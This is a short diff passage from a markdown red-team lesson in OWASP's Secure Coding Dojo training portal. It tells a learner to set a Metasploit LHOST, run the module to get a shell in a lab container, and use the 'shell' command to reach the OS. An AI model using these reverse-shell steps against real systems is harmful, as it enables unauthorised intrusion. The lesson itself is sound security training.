OWASP/SecureCodingDojo/trainingportal/static/lessons/redTeam/red_ch1.md

 `set LHOST <remote IP of Metasploit machine>`
 `run`

 You should be able to get shell at this point and run commands in the container.

+To drop into a OS shell use the `shell` command.

 Can you get the flag?
 Good luck!

 If you want to learn more about Metasploit, please check out this free course from Offensive Security: [Metasploit Unleashed](https://www.offensive-security.com/metasploit-unleashed/)